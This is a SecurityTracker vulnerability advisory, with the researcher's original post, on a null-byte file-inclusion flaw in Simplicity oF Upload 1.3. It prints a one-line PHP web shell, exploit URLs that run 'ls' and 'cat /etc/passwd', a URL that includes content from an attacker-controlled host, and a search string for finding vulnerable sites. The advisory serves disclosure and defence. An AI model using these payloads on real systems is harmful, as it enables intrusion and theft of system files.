SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   Simplicity oF Upload Vendors:   PHPSimplicity.com
Simplicity oF Upload Lets Remote Users Upload and Execute Arbitrary Code
SecurityTracker Alert ID:  1014591
SecurityTracker URL:  http://securitytracker.com/id/1014591
CVE Reference:   CVE-2005-2607   (Links to External Site)
Updated:  Jul 6 2008
Original Entry Date:  Jul 28 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.3
Description:   rgod reported a vulnerability in Simplicity oF Upload. A remote user can upload and then execute arbitrary code on the target system.

The script does not properly validate user-supplied input in the 'language' parameter. A remote user can supply a specially crafted parameter value ending in a null byte (%00) to include arbitrary local files.

A remote user can submit the following URL to cause both the download and upload pages to load at the same time:

http://[target]/simply/download.php?language=upload.php%00

This allows the remote user to upload a file that contains arbitrary PHP code but has a filename that appears to be an image file (e.g., 'cmd.gif'). A demonstration exploit file is provided:

<?php

system($HTTP_GET_VARS[command]);

?>

Then, the remote user can invoke the uploaded file to execute arbitrary commands on the target system with the privileges of the target web service. A demonstration exploit URL is provided:

http://[target]/[path]/download.php?language=cmd.gif%00&command=ls

A remote user can also supply a specially crafted URL that, when loaded by the target user, will redirect the target user to another web page:

http://[target]/[path]/download.php?language=http://[attacker]/[evil_page]%00

Impact:   A remote user can upload arbitrary code to the target system and then have the web server execute the code.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phpsimplicity.com/scripts.php?id=3 (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Simplicity OF Upload 1.3 (possibly prior versons) remote code execution & cross site scripting


Simplicity OF Upload 1.3 (possibly prior versons) remote code execution
& cross site scripting
 
software:
author site: http://www.phpsimplicity.com/scripts.php?id=3
 

remote commands execution:
 
problem at line 25-30:
...
//check for language overriding..
if (isset($_GET['language']))
   $language = strtolower($_GET['language']);
 
//now we include the language file
require_once("$language.lng");
...
 
you can include whatever adding a null byte to "language" parameter value:
 
example:
http://localhost:30/simply/download.php?language=upload.php%00
 
you will see upload & download page together :)
 
so you can upload a cmd.gif (when you upload a .php file, usually it is
renamed to .html...)  file with this php code inside to execute
commands:
 
<?php
 
system($HTTP_GET_VARS[command]);
 
?>
 
then try this url:
 
http://[target]/[path]/download.php?language=cmd.gif%00&command=ls
 
to list directories
 
http://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwd
 
to show /etc/passwd file
 
cross site scripting:
 
also, a remote user can supply a specially crafted URL to redirect other people
to an evil page:
 
http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00
 
 
 
googledork:
 
"Powered By: Simplicity oF Upload"
 

rgod
email: rgod[at]autistici.org
site: http://rgod.altervista.org
original advisory: http://rgod.altervista.org/simply.html
		
_____________________________________________________________________
 FREE Emoticons for your email! Click Here!                                        
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC